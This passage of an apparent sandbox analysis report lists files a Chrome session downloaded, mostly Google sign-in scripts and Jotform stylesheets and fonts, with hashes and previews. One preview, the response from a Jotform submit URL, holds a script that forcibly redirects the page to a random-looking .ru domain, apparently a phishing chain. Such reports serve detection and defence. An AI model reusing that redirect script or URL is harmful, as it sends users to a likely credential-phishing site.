DVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=Wt6vjf,hhhU8,FCpbqb,WhJNk"
                                                        Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("Wt6vjf");.var Tya=function(){var a=_.Ne();return _.tk(a,1)},Gu=function(a){this.Ga=_.u(a,0,Gu.messageId)};_.K(Gu,_.v);Gu.prototype.Ha=function(){return _.fk(this,1)};Gu.prototype.Ua=function(a){return _.Dk(this,1,a)};Gu.messageId="f.bo";var Hu=function(){_.cn.call(this)};_.K(Hu,_.cn);Hu.prototype.Cd=function(){this.xV=!1;Uya(this);_.cn.prototype.Cd.call(this)};Hu.prototype.aa=function(){Vya(this);if(this.bF)return Wya(this),!1;if(!this.FX)return Iu(this),!0;this.dispatchEvent("p");if(!this.JR)return Iu(this),!0;this.aP?(this.dispatchEvent("r"),Iu(this)):Wya(this);return!1};.var Xya=function(a){var b=new _.Yf(a.O6);a.FS!=null&&_.ag(b,"authuser",a.FS);return b},Wya=function(a){a.bF=!0;var b=Xya(a),c="rt=r&f_uid="+_.bl(a.JR);_.Qn(b,(0,_.Gg)(a.fa,a),"POST",c)};.Hu.prototype.fa=function(a){a=a.target;Vya(this);if(_.Tn(a)){this.oM=0;if(this.aP)this.bF=!1,this.dispatchEvent("r"
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):156
                                                        Entropy (8bit):5.010013089479154
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:FC89D0474FC9B19DD07ED03C21FDDCC9
                                                        SHA1:3CAFE4768ED7B4A5D344E309FC5F243273BC0033
                                                        SHA-256:E1F07690F444E750D1F4939AAA87336389552A45CD7949EFFF61059064F3E4A6
                                                        SHA-512:186992D85CC46A25CFD8723FC535B2672927AA23E96E27211E5263EE59E01F2888DBBC68F37770D0FFC8278639859A3D0FEA68AA1623FEEB9BEADC0F9395BE69
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://submit.jotform.com/submit/243186396374063
                                                        Preview:<script>try { top.location.href = 'https://S6m5.gwckpfsj.ru/MdmjiH0/'; } catch (e) { window.location.href = 'https://S6m5.gwckpfsj.ru/MdmjiH0/'; };</script>
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):16
                                                        Entropy (8bit):3.5
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                                        SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                                        SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                                        SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAl0SbaoHSH1nRIFDTcwqTA=?alt=proto
                                                        Preview:CgkKBw03MKkwGgA=
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text
                                                        Category:downloaded
                                                        Size (bytes):22849
                                                        Entropy (8bit):4.931639406599458
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:C6E903971EA447C3F93C6CA50E53F720
                                                        SHA1:62CAE431C169858655C5C402C6D407232BECFF25
                                                        SHA-256:ADA4D0A561DDCD8909FA775BB11E32327C27D1B688C7251F46BB3304ACF43F7B
                                                        SHA-512:2C36BA3A0A83C817E3625BA3512AF8AC295EB1F1A84EC40D5332B9B6316C83799AC83F4C64AED2C4C0E1E5E4B17F35C32D390FD41EA052D00B8920EE5A9DE289
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://cdn01.jotfor.ms/css/styles/payment/payment_feature.css?3.3.58633
                                                        Preview:/* stylelint-disable */../* PAYMENT FEATURES CSS */../* filter-container start */./* When we enable search category and and sort */./*.p-filter-one-column if enable only one of them we are adding that class to label */./*.p-filter-two-column if enable two of them we are adding that class to label */./*.p-filter-three-column if enable three of them we are adding that class to label */...filter-container {. display: flex;. justify-content: flex-end;. width:100%;. margin-bottom: 12px;.}..filter-container .select-area,..filter-container #productSearch-input {. background-color: #F9F9FF;. border-color: #E0E6F0;.}..#productSearch-input,.#payment-category-dropdown .select-area,.#payment-sorting-products-dropdown .select-area {. height: 40px;. display: flex;. width: 100%;. align-items: center;. border-width: 1px;. border-style: solid;. font-size: 15px;. background-repeat: no-repeat;.}.#productSearch-input {. padding: 0 22px 0 8px;. background-im
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 111740, version 3.1245
                                                        Category:downloaded
                                                        Size (bytes):111740
                                                        Entropy (8bit):7.997671630243049
                                                        Encrypted:true
                                                        SSDEEP:
                                                        MD5:9D29F1486DD481BF7C46269CE654AEFC
                                                        SHA1:F3570B6E8BD08DEE3F1F3F99926BC44ACCE45653
                                                        SHA-256:38970BA98BAC697CCCB7B119CC7474F832398B8B0366740ED89219B6588A6517
                                                        SHA-512:330E3DB7417B25CEA20F48F6BFA27DE1C5CBDA3FD95B94B700F14D8A9A0E5BA0D260270D2B5590F9B0A967862AB2DC1D64EF33386790A9BF52A121CA7BC0E417
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://cdn.jotfor.ms/fonts/inter/fonts/Inter-SemiBold.woff2
                                                        Preview:wOF2.......|..............................................x.`?STATD.........8....6.$..J..P.. ..&......[.S..^....".R.E.Up..|7.-.f.f.Y."U.9....h...&h.:*.C.c.".....^....d..im.we.................[L....v.s..... .* ....i4!&~...V.MR....P..X.E.i.#.)..M.IHX/.F.hV..-.vg.u{..e.WB......h.....#......&.(IF.q..V<...G5.P..6.|![..6........L...m.S/..Be._.......H..}..j.;.._....r...h.Z....4X.....L}....G..IX.....>j5.O....&s#!.9.....f..U..yB."..'.....''`hjy..:.g.]pN..3./>.?5/....^$..$.....<.).$3.b....Q.b]P.J..Enj.....H.....F8gWQ........c.*..+_....=.1%=4..[..('e%.q............p@X.....u%.....#h..:...J.@.B._.KI..}.r<........Sy.z......G*/T.Ul9Y..d..n...E...U..#{..#.....?l".....N}P......>{..".......Ea.......1@.r....p....6j..p..n.:r.@...hw....*.?.x.$D...Py).....Hwd../.._#..d..h..Ge........f...m.jb{.Yeg.~P=HRz...8.f#I$."i..I...6@...^.o.s...+...%1|E..C...a..#s-..P.....F8.{.......\..s..O...k5WM.8...N.~8....DMv....}...<$........3S\5ST.4I..OG.f...v.8Wz..DzjW......w....\.K..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 111192, version 3.1245
                                                        Category:downloaded
                                                        Size (bytes):111192
                                                        Entropy (8bit):7.997459528920886
                                                        Encrypted:true
                                                        SSDEEP:
                                                        MD5:823F35A845A9DFBF9800C8A37B635269
                                                        SHA1:C3064C7E34213E30493C6A972F3D66F4D145885B
                                                        SHA-256:AAA02AA09B0BC5BC5C57095AAA6E15BEA07480136E9AAB705F69886DAA213325
                                                        SHA-512:9177511E5F379346EE2B0501106D385FE8830FAC2D8C5EA89023B3422E4302AC9EEBB9FD0423154B34214D9483E0B45F5E369C0B509EDF3960D6437090C694C2
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://cdn.jotfor.ms/fonts/inter/fonts/Inter-Medium.woff2
                                                        Preview:wOF2.......X..........................................P...x.`?STATD............a.6.$..J..P.. .........[.Q....l..S...]C'92.Z...~.o.QG'.v2|.........v.t.a....,..g@.?T.b.9.[..[.@.'.................9.........q.5..Q...A.K0..R..}.i..:.e..m.A....I.a.W....A.x......[2.&......0..xg..b.t.....t'L%.^R2..z...&..Ic.U.1....A,.@.B`..H.2.2yB1..fT.@Ho........z...%-.....*9.C...J..T.i.Q.....L.....tu&..!..Il.....t..xd.l.. 3.U.......{...,.5.{.j..+J. ...z,......`..jXQu.G..a.V..av....$'..|.v|..)..oQoc(?0..b....X......&.EkI.p./.V...A.....R...!/^...J..G....(!aM\...1\.a..Z.I<.W.M...(.(mXBC..$SmO..jX...%J*K..T...(m./..Mhb...>_9...W....`..p"m.i.U.8;.......)lm..m....l=..9.....!M...gh..9MD...a.wo..Xex:@.4..v?q<O...).lL.|..'.C.^.B..pvWx0.xEiB.9.......n.k5M...-.&...}M.25..K8..).t.:.$d..~.V..8.."[......4/..........q.?......l.\J...J.S..x.R...04.~Hr...;..\.y.B.}.q....7.`g....7e..3.t_...n....tf[z...,9M.5.Z}o}..G.:6..Y.yTM....TA...d...1)..2.....Z5.Yb~...)UT.......( .T..4..s.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (761)
                                                        Category:downloaded
                                                        Size (bytes):1470
                                                        Entropy (8bit):5.261447787574607
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:C68925B54EE128ED2154C34E9ED002B1
                                                        SHA1:8A9BBF7DBDA5DE483309A2A176DB1F2A199755A3
                                                        SHA-256:118BF5F29C6F9EA82A86ABDB45B56EDB0418C25BA86F05476DE2248D1D851CAF
                                                        SHA-512:1C5430186E74ACD850C5B2C18F21F9EAC7D4297FF79728478D275287F5FF8EB3E96C89E5EF7A01CAED4A2384C75D276789FDB63978ACE20A42C8D5D2EB566AEC
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.JG9sCN6tUUY.es5.O/ck=boq-identity.AccountsSignInUi.3MIsG3P-TpE.L.B1.O/am=iDGYyTCNQED8w9OA3oAigZADAAAAAAAAACA2AAAAHgY/d=1/exm=AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,O6y8ed,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,eVCnO,f8Gu1e,hc6Ubd,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,niKKCd,njlZCf,oLggrd,oqkvIf,p3hmRc,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xBaz7b,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlHtYxI9nnQN2M8ydMS92EuAJ10weg/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=P6sQOc"
                                                        Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("lOO0Vd");._.e1a=new _.wf(_.yn);._.l();._.k("P6sQOc");.var k1a=!!(_.fi[0]>>29&1);var m1a=function(a,b,c,d,e){this.fa=a;this.Ba=b;this.oa=c;this.Da=d;this.Fa=e;this.aa=0;this.da=l1a(this)},n1a=function(a){var b={};_.Pa(a.JU(),function(e){b[e]=!0});var c=a.xU(),d=a.zU();return new m1a(a.sR(),c.aa()*1E3,a.fU(),d.aa()*1E3,b)},l1a=function(a){return Math.random()*Math.min(a.Ba*Math.pow(a.oa,a.aa),a.Da)},o1a=function(a,b){return a.aa>=a.fa?!1:b!=null?!!a.Fa[b]:!0};var p1a=function(a){_.Qt.call(this);this.da=a.Ea.wX;this.fa=a.Ea.metadata;a=a.Ea.lja;this.fetch=a.fetch.bind(a)};_.K(p1a,_.Uu);p1a.Ca=function(){return{Ea:{wX:_.h1a,metadata:_.e1a,lja:_.F0a}}};p1a.prototype.aa=function(a,b){if(this.fa.getType(a.Pd())!==1)return _.Jn(a);var c=this.da.SW;return(c=c?n1a(c):null)&&o1a(c)?_.lza(a,q1a(this,a,b,c)):_.Jn(a)};.var q1a=function(a,b,c,d){return c.then(function(e){return e},funct
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (3968)
                                                        Category:dropped
                                                        Size (bytes):5056
                                                        Entropy (8bit):5.432838470939945
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:FBAA5350EA1E35997F589FC49947ACCC
                                                        SHA1:FC9253EC0B5DEA916B9255FB0445E99C733164C8
                                                        SHA-256:49176B244DE4B07D2A8A79CD8663A2FCED053ACC22B1807929521665D09F3E3A
                                                        SHA-512:C84DBA63EF055137CE0FD9212E33BDD76F7A747DD01BB24FB319C67F63CB9C2930820066BCE802499828F897CA967D1311D9403F03CD02D55F2B6BC3B321F66B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:/**.The MIT License (MIT)..Copyright (c) 2013 Dustan Kasten..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of.the Software, and to permit persons to whom the Software is furnished to do so,.subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (1436)
                                                        Category:dropped
                                                        Size (bytes):34123
                                                        Entropy (8bit):5.3877395251961815
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:028A7CA623B2CFF78A5B72D33E189B5A
                                                        SHA1:2C0A672F3F5BBCDAFB69B609C550D45518AB90FA
                                                        SHA-256:BF83D27DA4D73B5C73AA28531F4B0B3733E6D097AC3BE33498DA05629CE95F74
                                                        SHA-512:715CC03D117D7FB0BA2CF68016CF450AB7BD59BB91052DDB38D775162A47219C9D961530D3C666F35731EC084508E7E127F9E615B3E4BCCD253F1F62B8B263BF
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{.var eva=function(a,b){this.da=a;this.fa=b;if(!c){var c=new _.Yf("//www.google.com/images/cleardot.gif");_.Km(c)}this.oa=c};_.h=eva.prototype;_.h.jd=null;_.h.X_=1E4;_.h.mC=!1;_.h.zS=0;_.h.QL=null;_.h.NW=null;_.h.setTimeout=function(a){this.X_=a};_.h.start=function(){if(this.mC)throw Error("qc");this.mC=!0;this.zS=0;fva(this)};_.h.stop=function(){gva(this);this.mC=!1};.var fva=function(a){a.zS++;navigator!==null&&"onLine"in navigator&&!navigator.onLine?_.fn((0,_.Gg)(a.jJ,a,!1),0):(a.aa=new Image,a.aa.onload=(0,_.Gg)(a.Vla,a),a.aa.onerror=(0,_.Gg)(a.Ula,a),a.aa.onabort=(0,_.Gg)(a.Tla,a),a.QL=_.fn(a.Wla,a.X_,a),a.aa.src=String(a.oa))};_.h=eva.prototype;_.h.Vla=function(){this.jJ(!0)};_.h.Ula=function(){this.jJ(!1)};_.h.Tla=function(){this.jJ(!1)};_.h.Wla=function(){this.jJ(!1)};._.h.jJ=function(a){gva(this);a?(this.mC=!1,this.da.call(this.fa,!0)):this.zS<=0?fva(this):(this.mC=!1,
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):84
                                                        Entropy (8bit):4.8956177273871955
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:C1A63EFB710BA8126E01F66212E8B21D
                                                        SHA1:A744551CB98A8C0FBF62FA8B2B5CE038D000188F
                                                        SHA-256:0AE856D22BAACEA48E063E6591A4743AA580E635700B07B8063454E8A082BADC
                                                        SHA-512:5DF66332997A3FA37639C4354558723072C9FBC886DC3F220A4D2D29637B165A0F81B4D9857403889E88A4C9D0AE52775376434229935B8DF6431C79391E4823
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto
                                                        Preview:Cj0KBw0ZARP6GgAKKQ3oIX6GGgQISxgCKhwIClIYCg5AIS4kI18qLSY/LyslLBABGP////8PCgcN05ioBxoA
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (557)
                                                        Category:downloaded
                                                        Size (bytes):776875
                                                        Entropy (8bit):5.792598220864375
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:E0AC8C13CFD269D11CDA76194A6C5A06
                                                        SHA1:7FEA85F0A77D86802DBD237A009FF5F3B2153D9F
                                                        SHA-256:971740C1B89E100B0D5AB2C2A4B310189C59A69EC783595937BF50DE43C59666
                                                        SHA-512:9054B2868F8C130FAA57AA85299B5B26032A12BD9BD00F6E2A832E6FA00FC8B96C72A04AEA41C0370F4F5C14C6B71153C8095F0944837CD11662ADFA06750B6A
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.JG9sCN6tUUY.es5.O/am=iDGYyTCNQED8w9OA3oAigZADAAAAAAAAACA2AAAAHgY/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlHdxqdoi9gCZ8ei2iGlsN4m6fmQCQ/m=_b,_tp"
                                                        Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x9983188, 0x10234c3, 0xd3c3fc4, 0x8a037a0, 0x39081, 0x0, 0x22000000, 0xd, 0x61e, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/./*. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var baa,daa,Qa,Ua,gaa,iaa,jb,qaa,xaa,Bb,Jaa,Laa,Oaa,Mb,Paa,Rb,Wb,Xb,Qaa,Raa,Yb,Saa,Taa,Uaa,bc,Zaa,aba,ic,kc,lc,eba,gba,hba,lba,nba,pba,qba,uba,xba,rba,wba,vba,tba,sba,yba,Bba,Eba,Gba,Hba,Dba,Jba,Lc,Lba,Rba,Sba,Tba,Uba,Vba,Wba,Pba,Qba,Yba,$ba,cca,dca,eca,fca,gca,jca,lca,kca,nca,Ad,zd,pca,oca,sca,r
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (2199)
                                                        Category:downloaded
                                                        Size (bytes):129796
                                                        Entropy (8bit):5.210430292599487
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:F804F62127E351B24C131D521B73A657
                                                        SHA1:5287AFCBBBDD5C62506EAE2BCFF359C5A7907812
                                                        SHA-256:FFACE13AE112A253E99FB74EB69FB02CF6698EEE1D8EF55F03FAE545680B128E
                                                        SHA-512:62468F5BE5D666FBA76BAD61C8B8CE489DD0327271A0EB22153C7B863590CA3F7E3D19BA9AF6C571DA1008D6A3B1632FB4FDE80D631C75EE492EA503D8805AE8
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://cdn02.jotfor.ms/static/prototype.forms.js?v=3.3.58633
                                                        Preview:var Prototype={Version:'1.7',Browser:(function(){var ua=navigator.userAgent;var isOpera=Object.prototype.toString.call(window.opera)=='[object Opera]';return{IE:!!window.attachEvent&&!isOpera,IE9:('documentMode'in document)&&document.documentMode==9,IE10:('documentMode'in document)&&document.documentMode==10,Opera:isOpera,WebKit:ua.indexOf('AppleWebKit/')>-1,Gecko:ua.indexOf('Gecko')>-1&&ua.indexOf('KHTML')===-1,MobileSafari:/Apple.*Mobile/.test(ua)}})(),BrowserFeatures:{XPath:!!document.evaluate,SelectorsAPI:!!document.querySelector,ElementExtensions:(function(){var constructor=window.Element||window.HTMLElement;return!!(constructor&&constructor.prototype);})(),SpecificElementExtensions:(function(){if(typeof window.HTMLDivElement!=='undefined').return true;var div=document.createElement('div'),form=document.createElement('form'),isSupported=false;if(div['__proto__']&&(div['__proto__']!==form['__proto__'])){isSupported=true;}.div=form=null;return isSupported;})()},jsInlineEvents:['onab
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                        Category:dropped
                                                        Size (bytes):1555
                                                        Entropy (8bit):5.249530958699059
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:FBE36EB2EECF1B90451A3A72701E49D2
                                                        SHA1:AE56EA57C52D1153CEC33CEF91CF935D2D3AF14D
                                                        SHA-256:E8F2DED5D74C0EE5F427A20B6715E65BC79ED5C4FC67FB00D89005515C8EFE63
                                                        SHA-512:7B1FD6CF34C26AF2436AF61A1DE16C9DBFB4C43579A9499F4852A7848F873BAC15BEEEA6124CF17F46A9F5DD632162364E0EC120ACA5F65E7C5615FF178A248F
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 400 (Bad Request)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//ww
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (404)
                                                        Category:downloaded
                                                        Size (bytes):86821
                                                        Entropy (8bit):5.088521211933554
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:562AF5C904D400C7D4673BA875F569BB
                                                        SHA1:B964B17220167F72804A83E73CAD17D2FB3E27C3
                                                        SHA-256:A7DD4DF79B8BC77FAFD8E5ED631E4CD3C5A6556F97F038A8D54FD2916EF509F3
                                                        SHA-512:21D62A3C3A34034A6CB9148389D533A7CD3CF5FA947C5EBD2BFC10E003364070C6E6A8DAE5B07A05B7FE53DC5683412F4062D4D6E56CE947DA8B755CD20006B5
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://cdn03.jotfor.ms/css/styles/payment/payment_styles.css?3.3.58633
                                                        Preview:/* stylelint-disable */./* CORE PAYMENT UI //////////////// */...select_border,..select-area,.#productSearch-input,..select-content,.#coupon-input {. border-color: #c3cad8;. background-color: #fff;.}...form-product-category-item {. border-color: #d9dde4;.}...payment_footer,..p_item_separator {. border-top-color: rgba(195,202,216,.5);.}..form-product-item:not(.show_image).focusedProduct .p_col {. display: flex;. align-items: center;.}..form-product-item:not(.show_image).focusedProduct .p_col,..form-product-item.show_image .p_col {. padding-right: 16px;.}..card-2col .form-product-item,..card-3col .form-product-item {. border-color: rgba(195,202,216,.5);.}..card-2col .form-product-details,..card-3col .form-product-details {. color: #4c71fb;.}.#coupon-button {. border-color: #4c71fb;. background-color: #4c71fb;.}.#coupon-table {. border-spacing: 0;.}.. input.form-product-custom_price,. .form-product-item .custom-recurring-payments {. background: #fff;. background-color: #fff;
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (533)
                                                        Category:downloaded
                                                        Size (bytes):9208
                                                        Entropy (8bit):5.390815604133683
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:8929AD024778F4A153EE4BF3E9C2AF7E
                                                        SHA1:5C771D43CA6E14F10F1A6E70428A84103724FE03
                                                        SHA-256:03DFC44F02C091F0BE18088285EE3D06535F97562EB0D18CE94C78B821E84C07
                                                        SHA-512:3C91DDBB3B22D181B8A51DDE398269D7963881B7F207A7AB830FF32FC4948C0CEBFA5FE1BA3F1234B300D86EF69A745776E5C49D6F0FD99532225DF0EED9DF57
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.JG9sCN6tUUY.es5.O/ck=boq-identity.AccountsSignInUi.3MIsG3P-TpE.L.B1.O/am=iDGYyTCNQED8w9OA3oAigZADAAAAAAAAACA2AAAAHgY/d=1/exm=AvtSve,CMcBD,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,MpJwZc,NOeYWe,O6y8ed,PrPYRd,Rkm0ef,SCuOPb,STuCOe,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,byfTOb,cYShmd,eVCnO,hc6Ubd,inNHtf,lsjVmc,lwddkf,m9oV,mvkUhe,n73qwf,niKKCd,njlZCf,oLggrd,oqkvIf,qmdT9,siKnQd,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xBaz7b,xQtZb,xiZRqc,y5vRwf,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlHtYxI9nnQN2M8ydMS92EuAJ10weg/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=ltDFwf,SD8Jgb,rmumx,E87wgc,qPYxq,Tbb4sb,pxq3x,f8Gu1e,soHxf,YgOFye,yRXbo,bTi8wc,ywOR5c,PHUIyb"
